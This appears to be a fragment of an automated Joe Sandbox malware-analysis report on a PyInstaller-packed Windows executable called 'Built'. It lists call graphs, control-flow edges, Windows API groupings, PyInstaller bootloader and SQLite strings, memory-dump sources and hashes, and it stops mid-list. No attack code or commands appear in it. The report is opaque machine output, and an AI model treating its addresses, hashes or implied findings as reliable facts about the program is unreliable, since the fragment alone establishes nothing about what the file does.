7ff6266557ec 59 API calls 3 library calls 86413->86434 86417 7ff626655724 86420 7ff62665572b CloseHandle 86417->86420 86421 7ff626655741 CloseHandle 86417->86421 86418 7ff626655751 86422 7ff626655755 86418->86422 86423 7ff626655780 86418->86423 86419 7ff6266556bf 86433 7ff62665a950 37 API calls _invalid_parameter_noinfo 86419->86433 86427 7ff6266556ca 86420->86427 86421->86427 86436 7ff626654eec 11 API calls 2 library calls 86422->86436 86437 7ff626655a34 51 API calls 86423->86437 86428 7ff62665578d 86438 7ff626655b70 21 API calls _fread_nolock 86428->86438 86430 7ff62665575f 86430->86427 86431->86411 86432->86419 86433->86427 86434->86417 86435->86418 86436->86430 86437->86428 86438->86430 86493 7ffdf155bca0 86494 7ffdf155bccb 86493->86494 86496 7ffdf155bcd0 86493->86496 86497 7ffdf1580110 86494->86497 86498 7ffdf1580129 86497->86498 86500 7ffdf1580135 86497->86500 86501 7ffdf1580040 86498->86501 86500->86496 86502 7ffdf158007a 86501->86502 86505 7ffdf1580087 86501->86505 86507 7ffdf157fa00 86502->86507 86503 7ffdf15800dd 86503->86500 86505->86503 86506 7ffdf157fa00 5 API calls 86505->86506 86506->86505 86508 7ffdf157fab8 86507->86508 86510 7ffdf157fae4 86508->86510 86511 7ffdf1520d00 86508->86511 86510->86505 86515 7ffdf1520d37 86511->86515 86513 7ffdf1520d99 86513->86510 86515->86513 86516 7ffdf1520f54 86515->86516 86517 7ffdf1520940 86515->86517 86516->86513 86521 7ffdf15191c0 00007FFE103019A0 00007FFE103019A0 86516->86521 86518 7ffdf1520951 86517->86518 86519 7ffdf1520971 86518->86519 86522 7ffdf1517e20 86518->86522 86519->86515 86521->86513 86523 7ffdf1517e75 86522->86523 86524 7ffdf1517e42 86522->86524 86523->86524 86525 7ffdf1517ff1 86523->86525 86528 7ffdf151800b 86523->86528 86524->86519 86529 7ffdf1515a10 86525->86529 86526 7ffdf151807b 00007FFE103019A0 86526->86524 86528->86524 86528->86526 86530 7ffdf1515a3f 86529->86530 86531 7ffdf1515a5c 86530->86531 86532 7ffdf150bbe0 2 API calls 86530->86532 86531->86524 86532->86531 86533 7ffdf145fe90 86535 7ffdf145feb0 86533->86535 86534 7ffdf145ffac 86535->86534 86536 7ffdf145fee8 00007FFE1FFB6570 86535->86536 86537 7ffdf145ff0d 00007FFE1FFB6570 86536->86537 86540 7ffdf145ff06 86536->86540 86538 7ffdf145ff31 00007FFE1FFB6570 86537->86538 86537->86540 86539 7ffdf145ff52 00007FFE1FFB6570 86538->86539 86538->86540 86539->86540 86540->86534 86541 7ffdf1460a42 00007FFE1FFB6570 86540->86541 86541->86534 86361 7ffdf1457df0 86362 7ffdf14412ee 86361->86362 86363 7ffdf1457e10 SetLastError 86362->86363 86364 7ffdf1457e37 86363->86364 86439 7ff626642fe0 86440 7ff626642ff0 86439->86440 86441 7ff62664302b 86440->86441 86442 7ff626643041 86440->86442 86467 7ff626642710 54 API calls _log10_special 86441->86467 86444 7ff626643061 86442->86444 86454 7ff626643077 __std_exception_copy 86442->86454 86468 7ff626642710 54 API calls _log10_special 86444->86468 86446 7ff62664c5c0 _log10_special 8 API calls 86447 7ff6266431fa 86446->86447 86448 7ff626641470 116 API calls 86448->86454 86449 7ff626643349 86475 7ff626642710 54 API calls _log10_special 86449->86475 86450 7ff626641c80 49 API calls 86450->86454 86452 7ff626643333 86474 7ff626642710 54 API calls _log10_special 86452->86474 86454->86448 86454->86449 86454->86450 86454->86452 86455 7ff62664330d 86454->86455 86457 7ff626643207 86454->86457 86466 7ff626643037 __std_exception_copy 86454->86466 86473 7ff626642710 54 API calls _log10_special 86455->86473 86458 7ff626643273 86457->86458 86469 7ff62665a474 37 API calls 2 library calls 86457->86469 86460 7ff626643290 86458->86460 86461 7ff62664329e 86458->86461 86470 7ff62665a474 37 API calls 2 library calls 86460->86470 86471 7ff626642dd0 37 API calls 86461->86471 86464 7ff62664329c 86472 7ff626642500 54 API calls __std_exception_copy 86464->86472 86466->86446 86467->86466 86468->86466 86469->86458 86470->86464 86471->86464 86472->86466 86473->86466 86474->86466 86475->86466

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ff626641000-7ff626643806 call 7ff62664fe88 call 7ff62664fe90 call 7ff62664c8c0 call 7ff626655460 call 7ff6266554f4 call 7ff6266436b0 14 7ff626643808-7ff62664380f 0->14 15 7ff626643814-7ff626643836 call 7ff626641950 0->15 16 7ff626643c97-7ff626643cb2 call 7ff62664c5c0 14->16 21 7ff62664383c-7ff626643856 call 7ff626641c80 15->21 22 7ff62664391b-7ff626643931 call 7ff6266445b0 15->22 26 7ff62664385b-7ff62664389b call 7ff626648a20 21->26 27 7ff62664396a-7ff62664397f call 7ff626642710 22->27 28 7ff626643933-7ff626643960 call 7ff626647f80 22->28 33 7ff62664389d-7ff6266438a3 26->33 34 7ff6266438c1-7ff6266438cc call 7ff626654fa0 26->34 42 7ff626643c8f 27->42 40 7ff626643984-7ff6266439a6 call 7ff626641c80 28->40 41 7ff626643962-7ff626643965 call 7ff6266500bc 28->41 37 7ff6266438af-7ff6266438bd call 7ff626648b90 33->37 38 7ff6266438a5-7ff6266438ad 33->38 48 7ff6266439fc-7ff626643a2a call 7ff626648b30 call 7ff626648b90 * 3 34->48 49 7ff6266438d2-7ff6266438e1 call 7ff626648a20 34->49 37->34 38->37 51 7ff6266439b0-7ff6266439b9 40->51 41->27 42->16 76 7ff626643a2f-7ff626643a3e call 7ff626648a20 48->76 58 7ff6266438e7-7ff6266438ed 49->58 59 7ff6266439f4-7ff6266439f7 call 7ff626654fa0 49->59 51->51 54 7ff6266439bb-7ff6266439d8 call 7ff626641950 51->54 54->26 65 7ff6266439de-7ff6266439ef call 7ff626642710 54->65 63 7ff6266438f0-7ff6266438fc 58->63 59->48 66 7ff6266438fe-7ff626643903 63->66 67 7ff626643905-7ff626643908 63->67 65->42 66->63 66->67 67->59 70 7ff62664390e-7ff626643916 call 7ff626654fa0 67->70 70->76 79 7ff626643b45-7ff626643b53 76->79 80 7ff626643a44-7ff626643a47 76->80 82 7ff626643b59-7ff626643b5d 79->82 83 7ff626643a67 79->83 80->79 81 7ff626643a4d-7ff626643a50 80->81 84 7ff626643a56-7ff626643a5a 81->84 85 7ff626643b14-7ff626643b17 81->85 86 7ff626643a6b-7ff626643a90 call 7ff626654fa0 82->86 83->86 84->85 87 7ff626643a60 84->87 88 7ff626643b19-7ff626643b1d 85->88 89 7ff626643b2f-7ff626643b40 call 7ff626642710 85->89 95 7ff626643aab-7ff626643ac0 86->95 96 7ff626643a92-7ff626643aa6 call 7ff626648b30 86->96 87->83 88->89 91 7ff626643b1f-7ff626643b2a 88->91 97 7ff626643c7f-7ff626643c87 89->97 91->86 99 7ff626643be8-7ff626643bfa call 7ff626648a20 95->99 100 7ff626643ac6-7ff626643aca 95->100 96->95 97->42 107 7ff626643bfc-7ff626643c02 99->107 108 7ff626643c2e 99->108 101 7ff626643bcd-7ff626643be2 call 7ff626641940 100->101 102 7ff626643ad0-7ff626643ae8 call 7ff6266552c0 100->102 101->99 101->100 113 7ff626643aea-7ff626643b02 call 7ff6266552c0 102->113 114 7ff626643b62-7ff626643b7a call 7ff6266552c0 102->114 111 7ff626643c1e-7ff626643c2c 107->111 112 7ff626643c04-7ff626643c1c 107->112 115 7ff626643c31-7ff626643c40 call 7ff626654fa0 108->115 111->115 112->115 113->101 124 7ff626643b08-7ff626643b0f 113->124 122 7ff626643b87-7ff626643b9f call 7ff6266552c0 114->122 123 7ff626643b7c-7ff626643b80 114->123 125 7ff626643c46-7ff626643c4a 115->125 126 7ff626643d41-7ff626643d63 call 7ff6266444d0 115->126 135 7ff626643bac-7ff626643bc4 call 7ff6266552c0 122->135 136 7ff626643ba1-7ff626643ba5 122->136 123->122 124->101 128 7ff626643c50-7ff626643c5f call 7ff6266490e0 125->128 129 7ff626643cd4-7ff626643ce6 call 7ff626648a20 125->129 139 7ff626643d71-7ff626643d82 call 7ff626641c80 126->139 140 7ff626643d65-7ff626643d6f call 7ff626644620 126->140 143 7ff626643c61 128->143 144 7ff626643cb3-7ff626643cbd call 7ff626648850 128->144 145 7ff626643ce8-7ff626643ceb 129->145 146 7ff626643d35-7ff626643d3c 129->146 135->101 157 7ff626643bc6 135->157 136->135 148 7ff626643d87-7ff626643d96 139->148 140->148 151 7ff626643c68 call 7ff626642710 143->151 163 7ff626643cc8-7ff626643ccf 144->163 164 7ff626643cbf-7ff626643cc6 144->164 145->146 152 7ff626643ced-7ff626643d10 call 7ff626641c80 145->152 146->151 154 7ff626643d98-7ff626643d9f 148->154 155 7ff626643dc4-7ff626643dda call 7ff626649400 148->155 165 7ff626643c6d-7ff626643c77 151->165 166 7ff626643d2b-7ff626643d33 call 7ff626654fa0 152->166 167 7ff626643d12-7ff626643d26 call 7ff626642710 call 7ff626654fa0 152->167 154->155 161 7ff626643da1-7ff626643da5 154->161 172 7ff626643de8-7ff626643e04 SetDllDirectoryW 155->172 173 7ff626643ddc 155->173 157->101 161->155 168 7ff626643da7-7ff626643dbe SetDllDirectoryW LoadLibraryExW 161->168 163->148 164->151 165->97 166->148 167->165 168->155 176 7ff626643e0a-7ff626643e19 call 7ff626648a20 172->176 177 7ff626643f01-7ff626643f08 172->177 173->172 189 7ff626643e1b-7ff626643e21 176->189 190 7ff626643e32-7ff626643e3c call 7ff626654fa0 176->190 179 7ff626643ffc-7ff626644004 177->179 180 7ff626643f0e-7ff626643f15 177->180 184 7ff626644029-7ff626644034 call 7ff6266436a0 call 7ff626643360 179->184 185 7ff626644006-7ff626644023 PostMessageW GetMessageW 179->185 180->179 183 7ff626643f1b-7ff626643f25 call 7ff6266433c0 180->183 183->165 197 7ff626643f2b-7ff626643f3f call 7ff6266490c0 183->197 202 7ff626644039-7ff62664405b call 7ff626643670 call 7ff626646fb0 call 7ff626646d60 184->202 185->184 191 7ff626643e2d-7ff626643e2f 189->191 192 7ff626643e23-7ff626643e2b 189->192 199 7ff626643ef2-7ff626643efc call 7ff626648b30 190->199 200 7ff626643e42-7ff626643e48 190->200 191->190 192->191 210 7ff626643f41-7ff626643f5e PostMessageW GetMessageW 197->210 211 7ff626643f64-7ff626643fa7 call 7ff626648b30 call 7ff626648bd0 call 7ff626646fb0 call 7ff626646d60 call 7ff626648ad0 197->211 199->177 200->199 204 7ff626643e4e-7ff626643e54 200->204 208 7ff626643e56-7ff626643e58 204->208 209 7ff626643e5f-7ff626643e61 204->209 214 7ff626643e67-7ff626643e83 call 7ff626646db0 call 7ff626647330 208->214 215 7ff626643e5a 208->215 209->177 209->214 210->211 249 7ff626643fe9-7ff626643ff7 call 7ff626641900 211->249 250 7ff626643fa9-7ff626643fb3 call 7ff626649200 211->250 228 7ff626643e8e-7ff626643e95 214->228 229 7ff626643e85-7ff626643e8c 214->229 215->177 231 7ff626643e97-7ff626643ea4 call 7ff626646df0 228->231 232 7ff626643eaf-7ff626643eb9 call 7ff6266471a0 228->232 230 7ff626643edb-7ff626643ef0 call 7ff626642a50 call 7ff626646fb0 call 7ff626646d60 229->230 230->177 231->232 243 7ff626643ea6-7ff626643ead 231->243 244 7ff626643ebb-7ff626643ec2 232->244 245 7ff626643ec4-7ff626643ed2 call 7ff6266474e0 232->245 243->230 244->230 245->177 257 7ff626643ed4 245->257 249->165 250->249 259 7ff626643fb5-7ff626643fca 250->259 257->230 260 7ff626643fcc-7ff626643fdf call 7ff626642710 call 7ff626641900 259->260 261 7ff626643fe4 call 7ff626642a50 259->261 260->165 261->249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                              • API String ID: 2776309574-3273434969
                                                              • Opcode ID: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
                                                              • Instruction ID: a0bc54d492fb74ba83bbc9bbfa4fd83e747064c75617aab85271ba1dba420f5f
                                                              • Opcode Fuzzy Hash: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
                                                              • Instruction Fuzzy Hash: 00329F21A0CA8391FE359B22EC653B96751BF84740F484032DA5DD32D6EFAEE554EB03

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 849 7ff6266669d4-7ff626666a47 call 7ff626666708 852 7ff626666a49-7ff626666a52 call 7ff626654f58 849->852 853 7ff626666a61-7ff626666a6b call 7ff626658590 849->853 858 7ff626666a55-7ff626666a5c call 7ff626654f78 852->858 859 7ff626666a6d-7ff626666a84 call 7ff626654f58 call 7ff626654f78 853->859 860 7ff626666a86-7ff626666aef CreateFileW 853->860 872 7ff626666da2-7ff626666dc2 858->872 859->858 863 7ff626666b6c-7ff626666b77 GetFileType 860->863 864 7ff626666af1-7ff626666af7 860->864 866 7ff626666bca-7ff626666bd1 863->866 867 7ff626666b79-7ff626666bb4 GetLastError call 7ff626654eec CloseHandle 863->867 869 7ff626666b39-7ff626666b67 GetLastError call 7ff626654eec 864->869 870 7ff626666af9-7ff626666afd 864->870 875 7ff626666bd9-7ff626666bdc 866->875 876 7ff626666bd3-7ff626666bd7 866->876 867->858 883 7ff626666bba-7ff626666bc5 call 7ff626654f78 867->883 869->858 870->869 877 7ff626666aff-7ff626666b37 CreateFileW 870->877 881 7ff626666be2-7ff626666c37 call 7ff6266584a8 875->881 882 7ff626666bde 875->882 876->881 877->863 877->869 887 7ff626666c56-7ff626666c87 call 7ff626666488 881->887 888 7ff626666c39-7ff626666c45 call 7ff626666910 881->888 882->881 883->858 895 7ff626666c8d-7ff626666ccf 887->895 896 7ff626666c89-7ff626666c8b 887->896 888->887 894 7ff626666c47 888->894 897 7ff626666c49-7ff626666c51 call 7ff62665ab30 894->897 898 7ff626666cf1-7ff626666cfc 895->898 899 7ff626666cd1-7ff626666cd5 895->899 896->897 897->872 902 7ff626666d02-7ff626666d06 898->902 903 7ff626666da0 898->903 899->898 901 7ff626666cd7-7ff626666cec 899->901 901->898 902->903 904 7ff626666d0c-7ff626666d51 CloseHandle CreateFileW 902->904 903->872 906 7ff626666d86-7ff626666d9b 904->906 907 7ff626666d53-7ff626666d81 GetLastError call 7ff626654eec call 7ff6266586d0 904->907 906->903 907->906
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                              • Instruction ID: 2a4b239bc42938db0c29a043dfb3ae7c8c225f3b66a64ed84993c92f0486f759
                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                              • Instruction Fuzzy Hash: 71C1B132B28A4286EF10CF69E8912AC3761FB49B98F115225DE2ED7795CF3ED411D702
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007$B5630CreateE103019File
                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                              • API String ID: 568289115-3829269058
                                                              • Opcode ID: 1b2a7c53af12bdbe0c878ab5fa1b74bd895439f0f24456165b4c702e91fc1b90
                                                              • Instruction ID: 8636b7b12a4abff12fe23d9dfb6c7cffb5a7e5d2c00aa4df251c56a509fcec2d
                                                              • Opcode Fuzzy Hash: 1b2a7c53af12bdbe0c878ab5fa1b74bd895439f0f24456165b4c702e91fc1b90
                                                              • Instruction Fuzzy Hash: D732C121F0D65386FB668BA4A464B7967A8FF84760F284635D97E023ECDF3CE4859700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 3300690313-0
                                                              • Opcode ID: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                              • Instruction ID: d059a73ba7cf1f15a31f34a598a67b922736cb15336de7a60ac0c10bab276b1f
                                                              • Opcode Fuzzy Hash: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                              • Instruction Fuzzy Hash: F862562272819296E7168F39D41077D7BA4F788795F045532EAAED37C8EB3CEA45CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103019
                                                              • String ID: database schema is locked: %s$statement too long
                                                              • API String ID: 2848303308-388537643
                                                              • Opcode ID: 47b157e483caf21196fdc259579a5533f8dc661c32b5f0ec5790168fc495ebcb
                                                              • Instruction ID: 51705d0d21f3ece99b8d274523ead2e493b45c3e99619dea82e66088dfa7a6e9
                                                              • Opcode Fuzzy Hash: 47b157e483caf21196fdc259579a5533f8dc661c32b5f0ec5790168fc495ebcb
                                                              • Instruction Fuzzy Hash: ACE19222B1978286FB669B219460BBD67B8FB44B54F848035DA6D077EDCF3DE498C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: :memory:
                                                              • API String ID: 2248877218-2920599690
                                                              • Opcode ID: ee23b59d19c7649da2495297630407580cb998f5201e9e0c00ee3db02f2d9191
                                                              • Instruction ID: a5868a480fc454c57bca787a639518bce8499358dfee2e1cefa94dcb0c0a4f19
                                                              • Opcode Fuzzy Hash: ee23b59d19c7649da2495297630407580cb998f5201e9e0c00ee3db02f2d9191
                                                              • Instruction Fuzzy Hash: AF429F22B0979296EB6A8B259464B7937B8FF85B44F044136DE6D137E8DF7CE488C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                              • Instruction ID: 591a331624e7a7add791163fc94b0685481a0cfaa248aeb4fc6dfbffb7cda6ac
                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                              • Instruction Fuzzy Hash: B1F0A422A18642C6FB708B60B85876A6350BB85338F040335D96D426D4DF7DD4589F02
                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?,?,?,?,00007FFDF15B984B,?,?,?,?,00007FFDF150831D,?,?,?,?,00007FFDF1534917), ref: 00007FFDF150F4E8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 0f2854fc0c1696ac9a4d72ac8c4f09e52b18281d07824d8197d11b144013fc62
                                                              • Instruction ID: b9753bba1aded3c352ff9714476b4b96b8b994a9613d7fbc91ee92675c41a1a4
                                                              • Opcode Fuzzy Hash: 0f2854fc0c1696ac9a4d72ac8c4f09e52b18281d07824d8197d11b144013fc62
                                                              • Instruction Fuzzy Hash: F4A1E321F0EB0786FF5A8BA5A870A7422B8BF45B84F580536C92E463FCDF6DE5558240
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true
                                                              • Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
